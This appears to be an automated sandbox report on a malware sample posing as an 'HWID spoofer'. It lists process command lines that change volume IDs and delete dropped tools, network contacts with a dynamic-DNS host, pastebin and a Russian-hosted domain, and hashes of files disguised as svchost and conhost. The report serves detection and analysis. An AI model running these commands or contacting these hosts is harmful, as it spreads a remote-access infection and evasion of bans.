C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: OGMZ-29J5
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: N34Z-6G4S
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: N34Z-6G4S
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: 6FL6-RP21
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: 6FL6-RP21
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: HIU6-BRFZ
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: HIU6-BRFZ
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: VC7C-LGVL
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: VC7C-LGVL
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: L6PU-6J8V
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: L6PU-6J8V
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: 9D3O-T6LE
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: 9D3O-T6LE
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: O7HD-TDAV
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: O7HD-TDAV
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: VU3M-LI40
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: VU3M-LI40
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: C0PZ-OF17
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1504420250-846587836-7628121341193733096-892701185-2040556734-307579848-127215590"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: C0PZ-OF17
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: 9ZG0-G6U8
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: 9ZG0-G6U8
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: ZZUV-G0ON
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: ZZUV-G0ON
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: 61CA-T7M0
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: 61CA-T7M0
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: RSLE-OBSP
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: RSLE-OBSP
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: 7RL5-JJ2R
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: 7RL5-JJ2R
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: OTMT-C74U
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: OTMT-C74U
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: 5OM8-AL3E
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: 5OM8-AL3E
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: PR08-870P
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: PR08-870P
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: S5DM-SO80
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: S5DM-SO80
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: K725-KUD8
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: K725-KUD8
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.chm
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: T2KP-SG5T
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\Disk.bat
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amifldrv64.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amide.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.cfg
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: T2KP-SG5T
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | brofisthej.ddns.net | udp |
| SE | 2.70.186.204:4822 | brofisthej.ddns.net | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.34.170:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | gaming7core.info | udp |
| RU | 45.15.156.156:80 | gaming7core.info | tcp |
| RU | 45.15.156.156:80 | gaming7core.info | tcp |
| SE | 2.70.186.204:4822 | brofisthej.ddns.net | tcp |
| SE | 2.70.186.204:4822 | brofisthej.ddns.net | tcp |
| SE | 2.70.186.204:4822 | brofisthej.ddns.net | tcp |
| US | 8.8.8.8:53 | brofisthej.ddns.net | udp |
| SE | 2.70.186.204:4822 | brofisthej.ddns.net | tcp |
| SE | 2.70.186.204:4822 | brofisthej.ddns.net | tcp |
Files
memory/3048-2-0x0000000000440000-0x0000000000480000-memory.dmp
memory/3048-1-0x0000000074280000-0x000000007482B000-memory.dmp
memory/3048-0-0x0000000074280000-0x000000007482B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\svchost.exe
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Temp\svchost.exe
| MD5 | 521ec70932ee17a66ed10af0084ad77d |
| SHA1 | 01e52992c123b3586e237aa6325617d4774b3b89 |
| SHA256 | 258f0bf9f190beeba94c81bb735dd6f8d365d9f8192aa9d5e804c532808297db |
| SHA512 | e5a3c84ff0b410d964f5e6f6db97e1393be40643195606078ab110d0a36bb5e574cbf47b0f954ccf475efa44ae03c32a1ccf48afac8cc92702c9f7b133461a51 |
memory/2400-9-0x00000000011D0000-0x00000000014F4000-memory.dmp
\Users\Admin\AppData\Local\Temp\svchost.exe
| MD5 | e77c236931286a73fa3506f71826c52b |
| SHA1 | 7d678289e85943e838ae2cb5e8f474d0d846e7d4 |
| SHA256 | cbd04c70eb0868af9c9bb85517ba94a26bac836ea9f6f07755119ca8595cab11 |
| SHA512 | 3938718e014c0afdd197aa185021e4720684234ef4ed9478a1c309c488ad31586df1674f69c888a2ee1b9ef71dfe45122241fddf5d4fedd9197fa8af3ef13091 |
\Users\Admin\AppData\Local\Temp\SPOOFER.exe
| MD5 | e08c5d7191c398fc2774694a2f4e159a |
| SHA1 | ab633ee5c0db15b2e8369b20cb101ce87eeda89c |
| SHA256 | 87e406e19bda76421c42ef53c79d8b2dad3fd1ac2a588209e762d22768f53066 |
| SHA512 | 392df067287d65fc1a4307c5e9279906643b688300e3e74f8fb5a40c04db2e883a3e4dc86b2a24d7c44d62c7a0b4b23310de65112c0e1e4740964c7573a7c609 |
\??\c:\users\admin\appdata\local\temp\spoofer.exe
| MD5 | dbecf6442464c911dee4ecbeeb0770e8 |
| SHA1 | 2da60383715021e4c5de3625678ced0c222d3cd3 |
| SHA256 | 057347b76c3525049080a858f574b9869a7a60b90bfa7e3a26515e697d74b74a |
| SHA512 | 5e4582e36b808401e87eb267a3e46d37055ec3821f53399e23e09aa2c929f80fffcca2bdf94b23c345a7bfc355749db56a39a059ab778d140e79d70e8505d184 |
memory/2216-19-0x0000000000400000-0x0000000001274000-memory.dmp
memory/2216-20-0x000000007EBD0000-0x000000007EFA1000-memory.dmp
memory/3048-18-0x0000000074280000-0x000000007482B000-memory.dmp
C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe
| MD5 | 7fb32092d20c6325868086b33b1d1ddd |
| SHA1 | 4ca6718d6605bfd3a3dfc31fd57021e3f41c90d8 |
| SHA256 | 8b1cb763cb16c8d835eff50d65f3bc8a42f1138cb56c6ec1aed5578022e5a4ac |
| SHA512 | 2fd9b4d348c44bbe508be5bb223a4a1fb55053270adfe454cbbf13aace35480fa3927cbf38ddb669de3b8252c682f9ac5c8349f9c0a52b7e5bdb33ca546e05bd |
C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe
| MD5 | f824f733472e59701c52ad86fe42782b |
| SHA1 | 5294faea00be21cfd4aa6ce4cc57fcca04599515 |
| SHA256 | 9dca1421f4d7320e0aba91cfed792b09d59da4b39be037ab4bad1b2edf46cfdd |
| SHA512 | eaf8043be74e4568797f1d64b42742637d03be106db0146e881dd250fe6d79f2221dc5a935d9f95bc680c95a4592c23b2606016abc4b47713dab51112984617a |
memory/2160-47-0x0000000000860000-0x000000000094A000-memory.dmp
memory/2160-49-0x000007FEF54A0000-0x000007FEF5E8C000-memory.dmp
memory/2704-61-0x0000000073950000-0x0000000073EFB000-memory.dmp
memory/2704-63-0x0000000002E00000-0x0000000002E40000-memory.dmp
memory/2704-64-0x0000000073950000-0x0000000073EFB000-memory.dmp
memory/2216-68-0x000000007EBD0000-0x000000007EFA1000-memory.dmp
memory/2704-69-0x0000000002E00000-0x0000000002E40000-memory.dmp
memory/2160-70-0x00000000003E0000-0x0000000000460000-memory.dmp
\ProgramData\Microsoft\Windows\Volumeid64.exe
| MD5 | faab41ae28a7b9b4a1fb904fa9d8aba7 |
| SHA1 | 3d656b938397b1d3d4716500f0a933db0fec324f |
| SHA256 | 5eaa45602580e6754d8e81e3746c335be1d5c8ed1eb972cbed8317618c0219ae |
| SHA512 | 11abb062d3c0e06229ca876b008420f7b0ea4546c6000839e6ebd9906ca721fce091bb159120c5dc93d2e4e095ce4ab12ea7b62f047821e6d005c107ba41f4e9 |
\ProgramData\Microsoft\Windows\Volumeid64.exe
| MD5 | be3d4133b6c4a981da3c10a01c71008c |
| SHA1 | 3ee221a53ea841e8935528f63e112f2efe20ea2c |
| SHA256 | 37fd8f416a25ebd6a0c605999f581508e88e672e8ef0bb6faae3f409f773bfb6 |
| SHA512 | 7f280ad01afd6adbe88f0cb3d716ebb1f3a3bebe46331567125558df8361b7a0ea180cd3d795e58aa86ea01f380ab931b1e5a240c43a92565a8aec42b8b2c69e |
memory/2704-65-0x0000000002E00000-0x0000000002E40000-memory.dmp
memory/2216-56-0x0000000000400000-0x0000000001274000-memory.dmp
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
| MD5 | 082ca63f02c50b877313299baba23fa1 |
| SHA1 | 07d88a47fad75ec5f49254135ee2930eeada8130 |
| SHA256 | 3ec923ff3fd3fd050af91fca6f5ce9e900a75d061482fd234ccad216129ce494 |
| SHA512 | 23f6e6d2f2ef0f260845286ffc0e6b18e004e80860c0457098615870455a386cef61028de0a29a90853a9745430cf42bdbddabaa7e2c528082ff83fd45109814 |
C:\Users\Admin\AppData\Roaming\conhost_sft.exe
| MD5 | f1aa1e70ac5d548be559f15eadd6b5de |
| SHA1 | 14e26351e1aefdd4295274d1fe00e4edbe835623 |
| SHA256 | 8aef527ae48d69e87ccb5967806e9d04f5284562749f99f326521f54b14965ca |
| SHA512 | b3eb22156607721e0decbbe3ab9b50b32d1811576dfa1c4c30fe14a097726ae13bdcedef544e08f35482a10f9f8912b94dc1d890a50363cbfbfd9c2abc4566ee |
\Users\Admin\AppData\Roaming\conhost_sft.exe
| MD5 | 757a6103be658c1a8991cef9470fda49 |
| SHA1 | bd247f297cb203866a1464916d05b8f91175f178 |
| SHA256 | 7a437698eee60b4489c6eab553b5ee971d9757d975d68d2fb0d57136b5eb91a4 |
| SHA512 | 942c6388d53d312785844c9ac519eb055fc6b3752763d80350d6eb95ba6f84a9321cd9331394c084bf9cdb55517cdc2e5724f0b2e5efa1aa78a0b5ab81dc950e |
\ProgramData\Microsoft\Windows\Volumeid64.exe
| MD5 | 7401c8afd09cddd3746b1afaa7ff1a56 |
| SHA1 | ffe52a0adbacfd6ee7664cff63c8e23876d582e7 |
| SHA256 | 7e2b32f5cfb8230042b32dde0df8f0c8b0421bf9881f93c676cb2b9dfe311493 |
| SHA512 | a241d5221803bf38119c29e29f6a98eb8282ddee89ab959bb7b50ae54173d93ed55d4010d771ee4fd13af4624343dad53f965ce27043aa1ea936562c6bfa2496 |
C:\Users\Admin\AppData\Roaming\conhost_sft.exe
| MD5 | fb457e29d997a0e3f45edb3737edbd8b |
| SHA1 | 5fdb4e1e81d7f61444813f128f9fc22a7ba5bba2 |
| SHA256 | ada259c0c62a83d4f21a5674cc3b7d3df81f1106df150df10ae11e7d041907c4 |
| SHA512 | e1a539eebbf7fbf3a64c9945c55831a0bddc53c8a68234b690afbd5e0bfdc84c650ac1fce1478af73e87b47aaff0cdd9c347a75314b7536a42272cb7af7bac61 |
\Users\Admin\AppData\Roaming\conhost_sft.exe
| MD5 | d37bb65e757ee8fdeea042569157978d |
| SHA1 | d362ea9fa224e2b27cfbf54a52c5c9817bc03dd6 |
| SHA256 | a6a8a6f38be644c5366b1ff1dd035baa37bfc0e12c5d669016e7af4b17a0b84a |
| SHA512 | 8bf3460cef8844754359538349a1284050334fc8e7a0a90dbd490c7213e97c6be17860ed8b10921f65e932b81b6bf78345e8504f38d02ea87aa9438abeb6be12 |
memory/2160-73-0x0000000000270000-0x000000000027E000-memory.dmp
memory/2160-71-0x0000000076D10000-0x0000000076D11000-memory.dmp
memory/2400-76-0x000007FEF54A0000-0x000007FEF5E8C000-memory.dmp
memory/2160-80-0x0000000076CF0000-0x0000000076CF1000-memory.dmp
memory/2160-84-0x0000000000290000-0x000000000029E000-memory.dmp
memory/2400-89-0x000000001B070000-0x000000001B0F0000-memory.dmp
memory/2160-92-0x000007FEF54A0000-0x000007FEF5E8C000-memory.dmp
memory/1356-102-0x0000000000DC0000-0x00000000010E4000-memory.dmp
memory/2160-101-0x00000000003E0000-0x0000000000460000-memory.dmp
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
| MD5 | 1421378b1fa1b2bec518c7b05c137359 |
| SHA1 | f9434edd2d2519865f650ad4983722b84b006310 |
| SHA256 | 9536b587fa1b06be4579cfb144cdb5d0ee43e265647a4d1e02205e0c845ed9d1 |
| SHA512 | fee464b29fc498dc58d9553b26a3818e95713682fc0072deca0a6e86027a168d4e2b55cb90c226e0b55d13f565d9fd3c42863a7ae1a8f2f3d797ce3d79adb599 |
memory/2160-99-0x0000000000390000-0x000000000039C000-memory.dmp
memory/1356-104-0x0000000000C80000-0x0000000000D00000-memory.dmp
memory/1356-103-0x000007FEF54A0000-0x000007FEF5E8C000-memory.dmp
memory/2160-97-0x0000000076CA0000-0x0000000076CA1000-memory.dmp
memory/2160-105-0x00000000003E0000-0x0000000000460000-memory.dmp
memory/2160-106-0x00000000003E0000-0x0000000000460000-memory.dmp
memory/2160-107-0x00000000003E0000-0x0000000000460000-memory.dmp
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
| MD5 | aa61c26178f5638d99a51ad16af63334 |
| SHA1 | 9b665e7279b02cbbed87cf137ff7fb6953e19b41 |
| SHA256 | 8c1b3fe7fbb15a6e85921449de39332adbf61e14f1594fead73d7a4fd3b472f2 |
| SHA512 | f8728a8724f4bffeb06cb300abdab394cd2d9e4aefbf74654bcbcc42abdf5c3b106b29f29d16323d973efdbda56458ea6328b1ac72c3637d57dbba4e6bc95ca4 |
memory/2400-109-0x000007FEF54A0000-0x000007FEF5E8C000-memory.dmp
memory/2160-110-0x00000000003E0000-0x0000000000460000-memory.dmp
memory/2160-111-0x00000000003E0000-0x0000000000460000-memory.dmp
memory/2160-108-0x00000000003E0000-0x0000000000460000-memory.dmp
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
| MD5 | a936be7e2adf8448872072bf4f918425 |
| SHA1 | ee4ea067ca1727eb0d2582cff6a5408efacb43dc |
| SHA256 | b3e9da6744d6402013d6f81980834f671d9c450e67bb8406b9f331f0c86fc4cb |
| SHA512 | 9635e128f1771e2c54f2235b8f3cf5e1e1d8482d4c69eddfef357123be0c8e77f781f9d6bf03b300f2d2e7103174497c1b47f032cb1dc7f94789e5b01e7edc0c |
memory/2704-94-0x0000000073950000-0x0000000073EFB000-memory.dmp
memory/2704-93-0x0000000073950000-0x0000000073EFB000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | cb40d768c31b953549a7ba22b2152ec3 |
| SHA1 | 6c599c0874dbe1fba5a624f9436c484489712eab |
| SHA256 | 2e9d73bda8d3fd06afe0d3e2288e97b0723ca91ba240ae73a6b7878f0e0bee9c |
| SHA512 | 7ce1a6c62bd7e6a6f25c98c052a5f323b950bdd4db4f7b7420786851049335183d40bf015a1e0ec836d8dd4719092c998415a2be89f6499736d62524a431cf12 |
memory/2120-136-0x0000000002790000-0x0000000002798000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\9Y1lSkPD5j.bat
| MD5 | bc85775176f545b33334ef022af524fe |
| SHA1 | ff782e1d7fbd8d36bd2dd54d8862fedae93f66bf |
| SHA256 | ab025d1f1ec7ef9d449abca6f2097b4c875e5bb58fe2543da4c255adada8042d |
| SHA512 | 7538c4db33b296d82fd2f40ef783d31741ab62631a834fc530498e3e5635701afcfd93fdce996ba5b6f1df5f715743455c3dd502a697895e879c8609d29bc14f |
memory/2120-155-0x0000000002840000-0x00000000028C0000-memory.dmp
memory/2120-157-0x000007FEEBBD0000-0x000007FEEC56D000-memory.dmp
memory/2120-158-0x000000000284B000-0x00000000028B2000-memory.dmp
memory/1748-161-0x000007FEEBBD0000-0x000007FEEC56D000-memory.dmp
memory/1748-165-0x00000000027CB000-0x0000000002832000-memory.dmp
memory/2156-167-0x0000000002E40000-0x0000000002EC0000-memory.dmp
memory/2156-166-0x000007FEEBBD0000-0x000007FEEC56D000-memory.dmp
memory/1684-164-0x0000000002D20000-0x0000000002DA0000-memory.dmp
memory/1748-163-0x00000000027C0000-0x0000000002840000-memory.dmp
memory/1748-160-0x000007FEEBBD0000-0x000007FEEC56D000-memory.dmp
memory/2120-159-0x000007FEEBBD0000-0x000007FEEC56D000-memory.dmp
memory/1748-162-0x00000000027C4000-0x00000000027C7000-memory.dmp
memory/2120-156-0x0000000002844000-0x0000000002847000-memory.dmp
memory/2120-154-0x000007FEEBBD0000-0x000007FEEC56D000-memory.dmp
memory/2160-152-0x000007FEF54A0000-0x000007FEF5E8C000-memory.dmp
memory/2120-134-0x000000001B4E0000-0x000000001B7C2000-memory.dmp
\ProgramData\Microsoft\Windows\DevManView.exe
| MD5 | bea003bc404490b73ade5f4cb8ce6ff7 |
| SHA1 | 2e9937eeca787dc6699ef49dc1ca79614fea5056 |
| SHA256 | 997fc0704e716cc05b5d4e277f582d52ce5a85d199254e31f0b58a7cff78918d |
| SHA512 | e2898d26569b82e38fbd0d32c0a26b4b5bfa1162da84a96bdf60f38bd8ae85cd68a3f4e531961c0610328a4a34cac0dbe3910cecaf40d77fa0c23445f01add7f |
C:\ProgramData\Microsoft\Windows\DevManView.exe
| MD5 | 8fb6a8b2a9a89c2559e0a43ac0f5d468 |
| SHA1 | 660e96d75615f5f7f4f0b0d3d93decb5324692c5 |
| SHA256 | 0713f4b6db2902ce9e5a487ee2796d2f605d963e631bf5c22fe81f02ff770a4b |
| SHA512 | 82dc5176141cae1506ee653073f15f11a84986fbdd815dd8d6cad9f209c3a72a0c6d8f90be71ccfd9cc3cd67a08b3eb4d22b02627bb89beacfacf939c8621a56 |
C:\ProgramData\Microsoft\Windows\DevManView.exe
| MD5 | 33d7a84f8ef67fd005f37142232ae97e |
| SHA1 | 1f560717d8038221c9b161716affb7cd6b14056e |
| SHA256 | a1be60039f125080560edf1eebee5b6d9e2d6039f5f5ac478e6273e05edadb4b |
| SHA512 | c059db769b9d8a9f1726709c9ad71e565b8081a879b55d0f906d6927409166e1d5716c784146feba41114a2cf44ee90cf2e0891831245752238f20c41590b3f5 |
C:\ProgramData\Microsoft\Windows\DevManView.cfg
| MD5 | 43b37d0f48bad1537a4de59ffda50ffe |
| SHA1 | 48ca09a0ed8533bf462a56c43b8db6e7b6c6ffa8 |
| SHA256 | fc258dfb3e49be04041ac24540ef544192c2e57300186f777f301d586f900288 |
| SHA512 | cfb1d98328aed36d2fe9df008a95c489192f01d4bb20de329e69e0386129aff4634e6fd63a8d49e14fc96da75c9b5ed3a218425846907d0122267d50fc8d7a82 |
C:\ProgramData\Microsoft\Windows\DevManView.exe
| MD5 | f767cb49f33f6045ad643c22be0b3864 |
| SHA1 | 685b254b2f5661849c33f9af86846bf8944a4987 |
| SHA256 | 6299af6e2abf728da0aa38cf414b8fe4eeb4c7ba308520570aa9d53fa6b36221 |
| SHA512 | 9cb52f30841e24b703cdff53c50f6010d8a929b25b79b70720ca01e9bd118415c0fec574fbb17f6bcbe1b703e55af424eeec668c317ff670a35a1b277ab7ea1b |
C:\ProgramData\Microsoft\Windows\DevManView.exe
| MD5 | 5638c6d4b50841a77cfdbf10a81281ec |
| SHA1 | 786583619f4d76a0dfc654eb2b908455fa5e91d4 |
| SHA256 | 002ddd6e7ee2c5e26f39c92c9f9fe95b9671188317f7eb1e5e856005c8d1e005 |
| SHA512 | 01bf90d9b7e0fa9e56ae9a5ed0a584043f243fd07b29e1ebe3882b7f04f73516e43afd0f9e6090d22d13996c758031f5e01e9e09130305cb0de8dd45276084b6 |
C:\ProgramData\Microsoft\Windows\Disk.bat
| MD5 | 250e75ba9aac6e2e9349bdebc5ef104e |
| SHA1 | 7efdaef5ec1752e7e29d8cc4641615d14ac1855f |
| SHA256 | 7d50c4fdcf6d8716c7d0d39517d479b3eeee02d2020ed635327405ae49c42516 |
| SHA512 | 7f0d7d41c9eafcd65daa674b5182cf52e11aa0f6d6baaee74fe4c4ffc08a163277c4981cd123af0cb1857ae6fd223b5e8c676d9dc5c646a870fbd9bc4001c438 |
memory/2160-91-0x0000000000380000-0x000000000038E000-memory.dmp
memory/2160-87-0x0000000076CE0000-0x0000000076CE1000-memory.dmp
memory/2160-86-0x00000000002F0000-0x00000000002FC000-memory.dmp
memory/2160-82-0x0000000000280000-0x000000000028E000-memory.dmp
memory/2160-79-0x00000000002D0000-0x00000000002E8000-memory.dmp
memory/2160-77-0x0000000076D00000-0x0000000076D01000-memory.dmp
memory/2160-75-0x00000000002B0000-0x00000000002CC000-memory.dmp
C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe
| MD5 | b1ca08130d15d230f7a677ae388a4c1d |
| SHA1 | 7e4309a7b1cbf6f11bcd74cf673b7321fabf6b62 |
| SHA256 | e3cf02c94c77c7a1ff03034c06c123b1f87a7f6e4fdbb8f3d1ddd014869d2c06 |
| SHA512 | d5dbddea08c03576a17a08feaa821e6b2a4aede4e6490366594f0772fb19078ee55035203de3511dd9c0c261cc48092b34f64249464231a774455ec05fb487f9 |
C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe
| MD5 | 091c78e4453d712abfc0f14d85dce7a8 |
| SHA1 | bae95215f98ab9acd6a8a47202e36bb3a87d81a6 |
| SHA256 | 7d1fb088adffafec708b719b0f866a9bb2c2cc9cd83f0f88143ad03f213a51a1 |
| SHA512 | 26683335688f1662887d405d1014f7730fbb47df6e287dd4948e23f7c1615b0b691f175fdb9dfb48a7079297ab9396e7c0b45ad78bc8b85e2bf2bcc344661eeb |
\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe
| MD5 | 5bd5db7b8c78397004887d2dfc3f9538 |
| SHA1 | f6a08c9b98fa32e7b21cda63f0be062117497804 |
| SHA256 | d0dbb2371536bff4ea34e6cdcf794fcd53b837d511f9b68b845810176a141dd3 |
| SHA512 | 621d69ade768b5317458b57408c7d473400c477a644aabb32da518a80a286b8f4fe7d66475df76194c74b79eea3a9264e2bbc68bf5a20ecc92a436800cb32cbe |
\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe
| MD5 | 9e60e3807eee263bfceef18110c9e1a0 |
| SHA1 | 3d5223be11649d2f79402bb6f5111a9d7a876852 |
| SHA256 | 7ce60b3c22bcfff1fe0c1549d418e7467cb9a51b09d0d90c25c5e25d6dd02c0e |
| SHA512 | 3e7d9d68c104e25b2f0cba761dd901df56543a9fdff11068cdd78938a5dc5d812625d3f8210a9596b3f002f7598807addda37066f60545f1467c0b2f7b7d7ec9 |
memory/2400-28-0x000000001B070000-0x000000001B0F0000-memory.dmp
\Users\Admin\AppData\Roaming\HpsrSpoof.exe
| MD5 | 209c8fc3d1a550ebdd6ad8fe706b6462 |
| SHA1 | fc26fdc6cf3e39d76edcc3b2ed805f5e6e823cb7 |
| SHA256 | 2aced574c1f0ffcbf93d13ab151aa6df8d97892961e2e4bfd03bfc8ff2024164 |
| SHA512 | 2517253fd2cd01f43c1887ffb67f39bd8712f47cfef00e76160aeec0f3872014be08a5b1666feb619cfeedb09248e8ed3d0fbada38acdde748a4c42942dbf697 |
memory/2400-16-0x000007FEF54A0000-0x000007FEF5E8C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe
| MD5 | 9b165c259ee3be57ca603c1d9702e8d1 |
| SHA1 | 7b260ca4251ad92f7114107f4c8f0c8364df8e2a |
| SHA256 | 93fbd1d181529d74650243e059329152e03ee855f02361b06ebe6a9d3386e143 |
| SHA512 | 793cbff9d7afe14a9d2a64dd4bab75dd75f92d8d81d4ba130c28211d2c8281fc8f568b1b11931f9f9325c4305ddc5c09201545fe28c0f0d03df4bf4bd32a57ed |
C:\ProgramData\Microsoft\Windows\amifldrv64.sys
| MD5 | 785045f8b25cd2e937ddc6b09debe01a |
| SHA1 | 029c678674f482ababe8bbfdb93152392457109d |
| SHA256 | 37073e42ffa0322500f90cd7e3c8d02c4cdd695d31c77e81560abec20bfb68ba |
| SHA512 | 40bbeb41816146c7172aa3cf27dace538908b7955171968e1cddcd84403b2588e0d8437a3596c2714ccdf4476eefa3d4e61d90ea118982b729f50b03df1104a9 |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | 67633ec83a4888b8b8a7661550072d8f |
| SHA1 | a356c06b3e08c67febc8a182286c60c05d5687e8 |
| SHA256 | cf2b859422876dfc32184f484a171877eeb45056a56f000a782324fb2283a463 |
| SHA512 | 5a6e98aa86fe5ab684388a61da0b6d37bedafbebc59422ee6c4b60918cafde4640af6c8d070f8a2d2cd1c642008749eebd152d1aea44fa6c008b1977b6430787 |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | 10dbda9d5f1a48a5580256b268c82aa4 |
| SHA1 | e2335edfe766a6a2cd1d157c4fe27fc7e72aac6e |
| SHA256 | cb250728ff1244ca2163cd137f5bbcf8e0f1e40debc49826de86a30bc21511a9 |
